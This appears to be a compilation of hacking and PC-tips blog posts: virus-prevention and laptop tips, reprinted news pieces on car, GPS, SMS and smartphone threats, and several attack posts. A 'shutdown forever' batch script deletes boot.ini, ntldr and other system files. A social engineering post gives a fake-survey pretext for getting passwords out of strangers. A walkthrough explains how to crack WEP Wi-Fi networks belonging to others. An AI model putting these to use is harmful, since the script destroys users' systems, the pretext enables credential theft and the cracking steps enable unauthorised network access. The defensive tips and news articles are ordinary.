Tips to Maintain a Virus Free Computer

Follow these Tips to Maintain a Virus Free Computer……

1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use a good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.

2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive.

3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).

4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.

• Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.

• You can also use a pop-up blocker to automatically block those pop-ups.

5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.

6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virues. If PC security is your first option then it is recommended that you go for a shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides realtime security for your PC. Make sure that this feature is turned on.

7. Install a good Antispyware program, that operates against Internet malware and spyware.

8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.

9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.

10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.

11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.

12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.

Thanks Kyrion.

Want to shutdown your PC Forever ?

Note : Please do not try this code. Code provided for Educational Purpose only. We are not responsible for any damage caused because of this post.

Code to shutdown your Windows PC Forever : Try at your own Risk.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.

DONT RUN THE BATCH FILE THIS WILL SHUT YOUR PC FOREVER…..

This should shutdown the  computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.

Got this code by Googleing…..More codes coming soon….

Make your Laptop Run Efficiently

Here are a few simple tips that you can use to make your laptop run faster, and last longer:

• Defragment your laptop on a regular basis – at least once a week. Your computer breaks all of your files up into many pieces, and scatters them throughout your hard drive.  What defragmenting does is take all these mixed and scattered pieces, and re-organizes them neatly into a space where they can be easily accessed more quickly.

Procedure : Right click on the drive (Ex. C:) –> Properties –> Tools –> Defragment Now.

Downloads : Instead of using the above method you can use a software called Defraggler for this purpose. DOWNLOAD

• Cleaning your Registry is a must. One of the most important parts of Windows is the registry. Fatal errors to your laptop can occur from disfiguration or corruption of this section. The most common cause of registry problems is buggy software installation.  Keep your registry clean and consider getting and running a registry cleaner from time to time. There are many of these programs available online, and some of them are even free .

Downloads : Ccleaner is one of the best freeware available for Registry Cleaning. DOWNLOAD

• Unclutter your hard drive of unnecessary programs and files such as entertainment, games, music, pictures, etc. If you allow them to add up, these files can clog the hard drive and slow it down. If your hard drive is too full, it can also cause problems with your computer’s RAM and processing capability. This can lead to significant slow-downs and frequent crashes.

Procedure : Delete all unnecessary Files (Shift+Delete allows you to delete files without storing them in recycle bin).

• Get good virus protection. You need to run a good anti-virus program and spyware/adware program at least once a week, if not more. Many people do this every day at start-up. Most of these programs are able to run automatically on their own schedule without your assistance, which can save you a lot of time . Here are some free Programs….

Downloads : Comodo Internet Security , AVG

• Empty the recycle bin regularly. It doesn’t do you a lot of good to delete all that unnecessary junk if it’s just going to sit in your Recycle Bin. No one likes taking out the trash but it needs to be done!

Procedure : Right click Recycle Bin –> Empty Recycle Bin

• Erase temporary Internet Files. This cannot be stressed or emphasized enough. Every time you go to a site on the web or open a file, a temporary copy is made and kept in your hard drive. They may be called “temporary” but they’re there for a long time. The more you have on your system, the more they’re going to slow down your laptop. Whether you’re running Firefox, Chrome or Internet Explorer, find out how to clear your browser’s cache, and do it regularly .

Procedure : Ccleaner will do this thing for you….!

• Get rid of unnecessary startup programs. Many programs want to start running as soon as you boot up your computer. Although these programs may not always be visible on your desktop, they’re still running in the background and sucking up your valuable RAM. This can significantly slow down the laptop as time goes by. Find out how to modify your “msconfig”, and manually remove these programs from launching on startup. You won’t be removing them from your computer, just preventing them from running every time you start up your computer .

Procedure : Win + R –> Type msconfig and press Enter –> Startup –> Uncheck unnecessary Programs –> Click ok.

• Keep your laptop running cool. Avoid keeping your laptop directly on a soft surface such as your bed or couch. It needs to be able to breather freely and allow air to circulate. Otherwise, your processor might overheat, causing slow-downs, crashes and even physical damage to components.

You may get cooler pads for cooling your laptop.

• Uninstall unused programs. Any programs that are not being used are just taking up space on your hard drive. Please note that deleting a program folder is not the same as uninstalling. Make sure to properly remove programs using the Uninstall function in your Control Panel. Otherwise, you could just end up creating more problems.

Procedure : Open Control Panel –> Select Add/Remove Programs –> uninstall unused programs.

• Upgrade your RAM if necessary. If you have a tendency of having many large programs all opened at once, you may not have enough RAM on your system. Look into purchasing some new RAM. Prices are very reasonable, and it’s a cost-effective way to increase the speed and efficiency of your laptop.

Social Engineering

Social Engineering is the art of Hacking In Real Life. Social engineering is the art of getting people to tell you stuff that they usually wouldn’t disclose, through the use of words and your appearance.

A good Social engineerer (or as I love to call these types of people, “Bullshit artists”), can make people believe nearly anything.

I will use the example of someone trying to get someone’s password:

Now the most important thing is having a believable story. If you go to someone and say “hotmail have requested i get your password for account checking”, then they will most likely tell you to piss off.

One of the most common ways that i use, is “I’m doing a survey”. Make a fake survey, attach it to a clip board, and just walk up to the person and start asking him questions.

For example:
Hi, my name is Alexander, and I am doing a survey on how strong peoples passwords are. You will be surprised at how insecure most people’s passwords are, and you may find it extremely worrying about how insecure your password may be. If you don’t mind, would you allow me to ask you a few questions?

The person will think “insecure personal information” and 9 times out of 10 will agree to talk to you.

Ask them questions like “does your password contain letters numbers and symbols”, “how long is your password” (when they are counting, watch their lips to see if they spell the words/numbers out), etc.

You may also be able to give them the “i also have a good way of calculating how strong your password is. This isn’t necessary but you can give me a password you use most frequently and i can calculate how strong it is”, but that sometimes pushes the bar a little too much.

Prevention of Social Engineering

As you can probably see above, the power of SE can EASILY be used against people. It is always a good idea to be aware of people who you don’t know, but it is also good practice to watch people you DO know. Don’t be getting paranoid about things, because that isn’t what i mean, but SE is the EASIEST way to hack anything.

Here are some tips of keeping safe:

I cant have a complete list, because Social Engineers are constantly changing the ways in which they gain trust.
A few things to look out for:

Something that is too good to be true

If its too good to be true, then it probably is. Always make sure that the person is trusted, or is well known. Hey, don’t just go on that, the person may have fooled everyone, but it is always good to ask yourself “If this is such a good offer, how can he/she be offering it.”

Someone who you never usually talk to has started being really interested in you

They might just have become really interested in you, but what for? If they start asking really strange/personal questions, I would recommend you play the “Playing it hard” game. Ask them the same question as your answer, and refuse to tell them until they tell you. Then just be like “I don’t believe you”. Doesn’t matter if its true or not, but what you have just done is proven to them they aren’t as trusted as they believed they were, even if its only psychological. Then just make up an excuse so you need to go. There are plenty of ways to just get out of something, but i prefer the method where you beat them at their own game. Make it SO much more entertaining =)

Someone you don’t know asks you for your details

Obviously you don’t give them out, you would have to be stupid to do that.

As a rule of thumb, just make sure that the person isn’t trying anything. You will find it hard to pick a real good Social engineerer, but just remember that there are always people out there who aren’t that good, trying it.

Remember: Never give out details, or secure information such as your passwords. Use passwords that aren’t anything to do with your age/DOB/FirstName/Surname etc. All of that can be found too easily.

This Post was written with the beginner in mind, and just defines the basics of the Social Engineering techniques.

Source : Hack PC Online

WEP Cracking in Windows

NTRODUCTION :

Many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on BackTrack and other Linux Tools .Im just sharing the method to Crack WiFi networks using WEP security protocol . The WEP is a very vuarable to attacks and can be cracked easily .

It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .

The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it .

You will be using two tools .

1.Commview for WiFi :

You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .The more packets you capture the better chances of cracking the password .You will need more than 1,00,000 minium packets to crack the password .The packets will be captured in the .ncp format .You will use this tool to convert the .ncp to .cap .

NOTE : Some WiFi cards are supported by Commview only in Windows 7 so i suggest you install Win 7 in ur Virtual Machine if ur card isnt supported .

 2.Aircrack-Ng GUI :

You will use this tool to crack the password of the Access Point using the .cap files you obtained from the Commview application .

NOTE : You need to run this as administrator .

I have provided links for both the software below .

Download Links :

These are the links to the official website of the tools .Some Anti Viruses might detect Aircrack as a virus . It is a false positive .

1.Aircrack-NG GUI

Get it from here : http://www.aircrack-ng.org/

 2.Commview for Wifi

Get it from here : http://www.tamos.com/download/main/ca.php

 GET READY TO CRACK :

STEP 1 :

1.Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP .
It automatically installs the necessary drivers . Allow it to install .

NOTE : You will not be able to connect to any Network using WiFi when using CommView .

STEP 2 :

2.Click on the PLAY ICON in the Left First .

STEP 3 (Choosing the Network (a) ) :

A new window should pop up now .
Click on the START SCANNING button .
Spoiler (Click to View)

STEP 4 (Choosing the Network (b) ) :

Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
NOTE : This tutorial is only for WEP protected networks .

STEP 5 (Capturing the Packets) :

The windows should close now and you should see that CommView has started Capturing Packets .

STEP 6 (Saving the Packets ) :

Now that the Packets are getting captured you need to Save them.
Click on Settings->Options->Memory Usage
Change Maximum Packets in buffer to 20000
Spoiler (Click to View)

Click on the LOGGING Tab .
Check AUTO-SAVING
In the Maximum Directory Size : 2000
Average Log File Size : 20

Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .

STEP 7 ( Concatenating the Logs ) :

Since you are capturing a lot of logs you will need to concatenate them into once file .
To do this go to Logging and click on CONCATENATE LOGS
Choose all the files that have been saved in your specified folder and Concatenate them .

Now you will have one .ncf file .

STEP 8 (Converting .ncf to .cap ) :

Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .
Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file
Now File->Export->Wireshark/TCP dump format .

——————————————————————

Aircrack Part :

Now for the Second Part Cracking this is very simple .

Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe

Choose the .cap file and you should be able to do the others .

SOURCE : Facebook.

Get your Old Facebook Chat Back…!!

Chrome users can get their Facebook Old Chat back PERMANENTLY !

Chrome Settings >> Tools >> Extensions >> Get More Extensions >>
type this in search –> “Facebook Chat Sidebar Disabler” install it
You have to restart FB for it to work.

Source: Karthic…

New and Rising Hacker Threats – III

Hackers controlling your car

The age of the connected car is dawning. Vehicles like the Ford Edge now provide 3G network access, a Wi-Fi router in the car and the ability to tap into your home Wi-Fi network (only while parked). In the next few years, more automakers will provide wireless access for web browsing and streaming high def movies. And by 2013, a new FCC-mandated wireless signal called DSRC (dedicated short range communications) will run at 5.9GHz and provide a vehicle to vehicle communication network.

For anyone who follows network computing or computing in general, adding these new features to a moving vehicle should raise a red flag as yet another way hackers can cause problems. Since these systems often tap into the car diagnostics and safety features, a hacker could potentially interfere with such systems and, for example, cause a car’s engine to surge at just the wrong time, says Stephan Tarnutzer, chief operating officer at automotive control console manufacturer DGE.

While no real world exploits are known to have happened, security researchers from the University of California and the University of Washington have hacked into the computers of several late model cars and remotely disabled the brakes, altered the speedometer reading, turned off the engine, locked passengers into the car and more.

The research team’s initial tests relied on plugging a laptop into the car’s diagnostic system, but later tests identified other entry points for an attack, including the cars’ Bluetooth and cellular connections. More wireless communications in future cars will create even more attack vectors.

The good news, Tarnutzer says, is that most of the forthcoming wireless technology for cars is for short-range communications, say from one lane to another or just as you pass through an intersection. That makes it difficult for hackers because they need to be in close proximity to the car.

Nevertheless, wireless connections in cars will undoubtedly make a tempting target for hackers. The answer, says Tarnutzer, is for the auto industry to use strong, hardware-based encryption technology.

For example, the OnStar communications and security service offers a theft recovery feature that makes use of wireless signals. If your car is stolen, you can report the theft to the police, who then contact OnStar, which can transmit a signal over a 3G network to stop the accelerator from working in the stolen car. OnStar’s transmissions are encrypted to thwart unauthorised attempts to tap into signals and interfere with vehicle operations.

Car companies are, of course, aware of the potential for hackers to disrupt in-car wireless services. Representatives from Ford and GM, for instance, said they are developing strong encryption standards for vehicle-to-vehicle and vehicle-to-back-end-infrastructure communications.

The technology for the connected car is for the most part still in a testing phase, says Tarnutzer. The DSRC network in particular will undergo thorough testing by both the car companies and the US Department of Transportation to make sure it is hacker resistant and uses strong encryption, he adds. “This is why it takes two to three years for an OEM to qualify a new vehicle, compared to six months for a new smartphone,” he says.

GPS jamming and spoofing: Threat or nuisance?

Another emerging criminal tactic, interfering with GPS signals, has security experts divided on just how harmful it could become.

Jamming a GPS signal at the source is next to impossible, says Phil Lieberman, founder of enterprise security vendor Lieberman Software. Blocking the radio signals broadcast from orbiting GPS satellites would require a massive counter-transmission. And because the satellites are operated by the military, jamming them would be considered an act of war and a federal crime, says Lieberman.

However, it is easy to jam GPS receivers with a low cost jamming device like one sold by Brando. The devices jam the GPS reception by overloading it with a similar signal, the receiver becomes confused because it can’t find a steady satellite transmission.

Lieberman says this kind of jamming is usually more of an annoyance than a major security threat. A hacker could, for instance, set up a jammer in an intersection and temporarily disable the GPS in passing vehicles. These attacks are relatively rare, says Lieberman: “It is usually just sociopaths doing this kind of thing.”

Lieberman doesn’t give much credence to fears about jammers disrupting airplanes or air traffic control systems, because those networks use a completely different GPS signal from the one we use in cars and handheld devices. Jamming could, however, be a potentially dangerous issue when it comes to financial records, he says, because GPS devices are used in the banking industry to add a timestamp to financial transactions. Although completely blocking transactions would be difficult, Lieberman said, an industrious hacker could theoretically disrupt transactions and cause headaches for banks.

Security expert Roger Johnston, a systems engineer at the Argonne National Laboratory, says spoofing GPS signals is the greater danger, explaining that GPS receivers are low power devices that latch on to any strong signal. In tests, he has set up a GPS spoofing signal, operated out of a passenger car, that sends erroneous GPS information to nearby receivers. “You don’t have to know anything about electronics or GPS to set these up, they are very user friendly,” says Johnston.

Johnston says spoofing could be used for serious crimes, transmitting information to a delivery truck that routes it into a dark alley where criminals are waiting, changing the timestamps on financial transactions, delaying emergency vehicles from finding their routes. There have been no reported cases of GPS spoofing to commit a criminal act, but Johnston warns that government and business should work to deter the attacks.

Typically, he says, the security industry is reactionary: “We wait until there is a catastrophic exploit until we do anything about it.” With about $15 worth of parts, today’s GPS devices could be retrofitted to detect GPS spoofing and notify the user that an attack is underway, Johnston says, “but because almost nobody is interested in GPS spoofing, this is not a project we have pursued.”

In the end, as Lieberman explains, there isn’t a lot individuals can do to prevent GPS jamming or spoofing. If someone transmits competing signals as you drive in a car or use a handheld, the receiver will fail or be fooled, but keep in mind that your GPS device will begin working properly again as soon as you move out of range of the jamming or spoofing device. However, it is worth noting that GPS jamming is illegal in the US and violates FCC regulations. If you suspect jamming or see someone using a GPS jammer, report it to the police.

For all the other threats we’ve covered in this story, taking some extra precautions using strong encryption technology, engaging only with trusted friends on social networks, and using penetration testing software on corporate networks can help alleviate some fears, even if the bad guys keep coming up with new ways to make us nervous.

Thanks Techworld.

New and Rising Hacker Threats – II

Social network account spoofing

Many of us use Facebook, LinkedIn and other social networks to connect with friends, family and colleagues, which leaves us vulnerable to a new technique called social network account spoofing. The idea is that a scammer poses as either someone you know or a friend of a friend to get close to you, then fool you into revealing personal information. He then uses that information to gain access to your other accounts and eventually steal your identity.

In a typical exploit, says Joffe, someone contacts you on a service like Facebook or LinkedIn, posing as a friend of a friend or a co-worker of someone you trust. Then, the new “friend” contacts you directly, usually through text message or email. It might seem surprising to have this “friend” contact you outside the social network, but he seems legitimate because you believe he has a connection with someone you trust.

In another scenario, a scammer might impersonate someone you already know, claiming to be an old friend from high school, for instance. Spoofers can find out your connections by following your public feeds or looking up the names of co-workers on sites like LinkedIn where you have posted your work info.

Once the scammer has established a connection with you, he uses devious means to steal personal data, such as chatting to find out the names of family members, favourite bands, hobbies and other seemingly innocuous information, then trying those as passwords or answers to security questions at banking sites, webmail accounts or other sites.

As Joffe points out, the idea behind social network account spoofing is “thousands of years old.” Conning you out of your personal information is an age old trick. Today’s social networks just provide a new avenue for con artists and criminals to get close to you. The trick works because there is often no way to know whether someone you’ve come to trust online is actually who he says he is.

“The problem with communication by Facebook or LinkedIn is that you are stuck in a web interface, you can’t check the IP address or header information. Everything is in a nice friendly world,” Joffe says.

Stratum Security’s Morehouse says hackers are becoming increasingly crafty on social networks. They first identify a target, then do the research: what is this person like, whom do they follow, what do they like to do?

What’s more, social network attacks are sometimes combined with email and website spoofing, Morehouse says. You might develop a friendship on LinkedIn and then get an email from that person that looks like it was sent via LinkedIn but is actually a fake. When you click the link to reply to the message, you’re taken to a fake LinkedIn site. Logging in there reveals your LinkedIn username and password to the spoofer.

Another type of attack Morehouse describes targets companies as well as individuals. The spoofer might set up a Facebook page pretending to be the official company page for, a retailer like office supply giant Staples. To make it seem credible, the spoofer might claim that the page is a formal method to contact the company or register complaints.

The page might offer free (but fake) coupons to entice people to join, and it soon goes viral as people share it with their network of friends. Once hundreds or thousands of users have joined the page, says Morehouse, the owner tricks them into giving out personal information, perhaps by signing up to receive additional coupons or special offers.

This is a double attack: Consumers are damaged because their personal data is compromised, and the company is damaged because its customers associate the fake Facebook page with the real company, and decide not to buy from that company anymore.

As with text message attacks, individuals’ best defence against spoofing attacks is to use common sense, Joffe says. Hackers usually do not do a good job of impersonating a person or company, and they tend to send links and phishing scams to con you. They might try to mimic a friend but rarely manage to accurately convey their personality. In some cases, the attacks are traceable through email headers or IP addresses, and most attacks are too general and untargeted to be believable to anyone who’s careful.

Other precautions might seem obvious but are often overlooked. If someone says he’s a friend of a friend or co-worker, make sure you confirm his identity with your common connection. And it’s a good idea to lock down your privacy settings at social networking sites so that your contact info, posts, photos and more aren’t visible to everyone. In Facebook, for example, select Account -> Privacy Settings -> Custom and click the “Customise settings” link at the bottom to gain control over exactly what you want to share with everyone, friends of friends, friends only or no one.

For companies, it’s a little trickier. Joffe says there is no way to prevent a hacker from setting up a fake Facebook page initially, but companies can use monitoring tools such as Social Mention to see how the company name is being used online. If an unauthorised page turns up, companies can ask the social network to remove the fake listing.

Cyberstalking

Social networks like Twitter and Facebook have changed the way we communicate in our personal and work lives, many would say for the better. Yet these useful portals also provide conduits that others can use to make our lives miserable.

A relatively new concept variously called cyberstalking, cyberharassment or cyberbullying involves an individual or a group making repeated personal attacks online, such as posting negative comments on every tweet you make or posting crude altered photos of you on a social network. The perpetrators may hide behind online aliases to hide their identities. By law, cyberbullying becomes a federal crime if a stalker makes any life threatening comments.

Most of us have heard of a handful of well publicised cases of cyberbullying among teens, but it’s also on the rise for adults who connect to social networks from their place of employment, according to Kathleen Baty, a personal safety consultant and CEO of SafetyChick Enterprises. These workplace-related attacks might involve another employee, or someone trying to steal company information.

“Cyberstalking in the workplace has become more and more common and is tough to define because there are so many different forms to threaten or harass in this digital world, and so many different motives behind the behaviour. It can be anything from a personal/romantic relationship gone bad, to a co-worker/business conflict, to a competitor trying to wreak havoc on a company,” says Baty.

To keep cyberstalkers off company networks, businesses should implement all the usual corporate security tools, such as firewalls and encryption, Baty says. Additionally, companies should institute a social media policy that outlines clear guidelines for what kinds of information employees should and should not post or discuss on public sites.

If you do become a victim of cyberstalking or cyberbullying, Baty advises you to report it immediately to local law enforcement authorities. If it happens at work, report it to your HR department as well. Don’t delete harmful posts or other electronic communications, she says, but instead retain all documentation of incidents, mainly as evidence but also because the headers for email and forum postings can be used to track down the offender.

That said, the best defence is to protect your personal information as carefully as you can. For instance, never reveal online such details as where you live, and don’t announce your movements, such as that you are on vacation or home sick and have left your workplace computer open to attack, which rules out public “check-in” social networks such as Foursquare.

New and Rising Hacker Threats – I

Hackers never sleep, it seems. Just when you think you’ve battened down the hatches and fully protected yourself or your business from electronic security risks, along comes a new exploit to keep you up at night. It might be an SMS text message with a malevolent payload or a stalker who dogs your every step online. Or maybe it’s an emerging technology like in-car Wi-Fi that suddenly creates a whole new attack vector.

Whether you’re an IT manager protecting employees and corporate systems or you’re simply trying to keep your own personal data safe, these threats, some rapidly growing and others still emerging, pose a potential risk.

Fortunately, there are some security procedures and tools available to help you win the fight against the bad guys.

1. Text message malware

While smartphone viruses are still fairly rare, text messaging attacks are becoming more common, according to Rodney Joffe, senior vice president and senior technologist at mobile messaging company Neustar and director of the Conficker Working Group coalition of security researchers.

PCs are now fairly well protected, he says, so some hackers have moved on to mobile devices. Their incentive is mostly financial. Text messaging provides a way for them to break in and make money.

Khoi Nguyen, group product manager for mobile security at Symantec, confirmed that text message attacks aimed at smartphone operating systems are becoming more common as people rely more on mobile devices. It’s not just consumers who are at risk from these attacks, he adds. Any employee who falls for a text message ruse using a company smartphone can jeopardise the business’s network and data, and perhaps cause a compliance violation.

“This is a similar type of attack as [is used on] a computer. An SMS or MMS message that includes an attachment, disguised as a funny or sexy picture, which asks the user to open it,” Nguyen explains. “Once they download the picture, it will install malware on the device. Once loaded, it would acquire access privileges, and it spreads through contacts on the phone, [who] would then get a message from that user.”

In this way, says Joffe, hackers create botnets for sending text message spam with links to a product the hacker is selling, usually charging you per message. In some cases, he adds, the malware even starts buying ringtones that are charged on your wireless bill, lining the pockets of the hacker selling the ringtones.

Another ruse, says Nguyen, is a text message link to download an app that supposedly allows free Internet access, but is actually a Trojan that sends hundreds of thousands of SMS messages (usually at “premium SMS” rates) from the phone.

Wireless carriers say they do try to stave off the attacks. For instance, Verizon spokeswoman Brenda Raney says the company scans for known malware attacks and isolates them on the cellular network, and even engages with police to block attacks.

Still, as Joffe notes jokingly, there is “no defence against being stupid” or against employee errors. For example, he recounts that he and other security professionals training corporate employees one-on-one about cell phone dangers would send them messages with a fake worm. And right after the training session, he says, many employees would still click the link.

To keep such malware off users’ phones, Joffe recommends that businesses institute strict corporate policies limiting whom employees can text using company networks and phones, and what kind of work can be done via text. Another option is a policy that disallows text messaging entirely, at least until the industry figures out how to deal with the threats.

For consumers, common sense is the best defence. Avoid clicking on text message links or attachments from anyone you don’t know, and use extreme caution even with messages from known contacts, who might unwittingly be part of a botnet.

2. Hacking into smart grids

A common misconception is that only an open network, say your corporate wireless LAN for visitor access, is hackable. Not true, says Justin Morehouse, a principal consultant at Stratum Security, who spoke about network security at last year’s DefCon security conference. Morehouse says it’s actually not that difficult to find an access point into a so-called closed system.

For example, the Stuxnet worm last year infected tens of thousands of Windows PCs running Siemens SCADA systems in manufacturing and utility companies, most notably in Iran, and it was largely spread via infected USB flash drives. Even some nuclear plants and power grids have wireless networks for employees to use.

“Stuxnet proved that it is relatively simple to cause potentially catastrophic damage” to an industrial control network, says Neustar’s Joffe.

According to Morehouse, another new attack point will be smart grids, which use electronic metering to streamline power management. Utility companies around the world have begun testing and rolling out smart meters to customers’ homes and businesses. The technology, which can send data to and receive it from a central system, can also be very helpful for IT: You can open a console to see the power usage for one section of a building, for example.

But smart grids might be vulnerable to attacks that would allow hackers to cut off electricity to homes and businesses, and create other kinds of havoc. One possible attack vector is a smart grid’s communications infrastructure. For example, Morehouse says, a German utility company called Yello Strom uses a consumer smart grid system that works like a home automation kit, the sensors report energy usage back to the central server via the user’s home Wi-Fi network.

Because of this, Morehouse says, it is possible for end users to tap into their own networks and gain access to the substation used for delivering power. “Often it’s the case that these types of networks are not properly segmented or protected,” he says. “Once in, the attacker may be treated as a trusted user and have access to other areas. Is there the potential that they could disrupt the substation or city? Absolutely. They may plant a back door that could allow the grid to be powered down at a particular time.”

Utilities in the US tend to use their own proprietary wired or wireless connections to sensors, but Morehouse is concerned that some may follow Yello Strom’s example and use home networks instead.

Another concern is vulnerabilities in the smart meters themselves, a problem that affects corporate smart grids as well. Researchers from security services vendor IOActive, for instance, discovered several bugs in smart grid devices that hackers could exploit to access the smart grid network and cut power to customers.

“Hackers use press releases to find out the technologies [used in corporate smart grids] and go back to the infrastructure and find vulnerabilities. So, for example, if Wal-Mart announces a smart grid using Siemens technology, a hacker suddenly has many of the answers they need to find that controller and break in,” Morehouse says.

The most effective preventive measure, says Morehouse, is rigid isolation. A smart grid should not touch any other network, ever. He says there is an urgent need for penetration testing and making sure the firewall in a closed network is secure because of the possible dangers of gaining access to the power grid. He advises using tools such as Core Impact and Metasploit.

The “rigid isolation” rule applies to home users as well. “Consumers should never bridge smart grid networks with their home networks,” says Morehouse. He also advises home users to become familiar with their smart meters so they can recognise whether they have been tampered with, and to ask their utility providers what security measures are in place to protect the meters and network.

Mobile Hacking: How Safe Is Your Smartphone?

New instances of phone hacking seem to emerge from Rupert Murdoch’s empire on a daily basis. But are the reports of interest beyond Murdoch and his detractors? Should you, as a consumer, fear that your phone will be hacked?

Not yet. Experts say that it’s still fairly easy to hack into your phone, but unless you’re a celebrity, you’re unlikely to be a target. Don’t get too comfortable, though. The era of safe mobile computing may be coming to an end as smartphones and other mobile devices become more popular than PCs.

For the moment, however, phone hacking is the farm team version of big league PC hacking. Methods — particularly in the case of the Murdoch charges which stretch back a decade in some cases — are pretty old school. Robert Siciliano, a McAfee consultant and identity theft expert, says probably the most prevalent way people hack phones is via “social engineering,” a.k.a. lying. For instance, a would-be hacker might call you and pose as the phone company saying they need to update your account and need your password. Or the hacker might get enough of your information to call the phone company and pose as you.

Steve Santorelli, director of global outreach at the Internet security research group Team Cymru, and former Scotland Yard police officer, says that the Murdoch phone hacks probably didn’t even take that much effort. It’s likely, he says, that the victims left a default password provided by the carrier on their phone and the hackers merely guessed correctly. Santorelli says that some carriers still use default passwords. Lesson: Change your passwords often.

There are, of course, more technologically savvy ways to hack your phone as well. A would-be hacker, for instance, might get a bit of information about your account and send a phishing email purportedly from your carrier asking you to log in. At that point they will have your password and other sensitive information. Smartphones also provide an opportunity to install monitoring software. iPhone owners are probably the safest in that regard, unless they jailbreak their phones, Siciliano says. Android users are less secure since publishers can upload their apps directly to Android Market. In March, hackers added malicious code to 58 Android apps, infecting 250,000 phones. “Android is more vulnerable because it’s a more open system,” says Siciliano. “While Google does vet its apps, some do slip by that are malicious.”

Once an app is installed, it can record all your calls and texts and, depending on what kind of apps you have and what you do with your phone, possibly get personal data related to banking and credit cards. There are other possibilities as well. A hacker could commandeer your phone into sending thousands of texts or making calls beyond your monthly minutes, causing you to rack up huge bills.

Such attacks are still pretty rare.”The low hanging fruit is still the PC,” says Siciliano. “If you are a criminal hacker, Microsoft’s OS is the most hacked software on the planet.” Yet that could be changing quickly. A recent survey by Flurry showed that consumers are now spending more time on mobile apps than on the web. Another by Mary Meeker of Kleiner Perkins Caufield & Byers estimated that combined tablet and smartphone shipments eclipsed those of desktops and laptops this year for the first time.

Security firms have taken notice. Market research firm Infonetics predicts sales of mobile security software will grow 50% each year through 2014, when it will hit $2 billion. AT&T also plans to start selling a security offering to customers next year.

In short, sometime soon phone hacks may not just be Hugh Grant’s problem. Says Santorelli: “If I had money right now, I’d bet on the Russian mafia. Mobile hacking is going to be huge.”

Source : Mashable.